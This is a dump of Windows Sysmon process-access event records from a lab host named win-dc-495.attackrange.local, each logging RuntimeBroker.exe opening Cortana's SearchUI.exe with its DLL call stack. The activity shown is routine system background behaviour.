13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
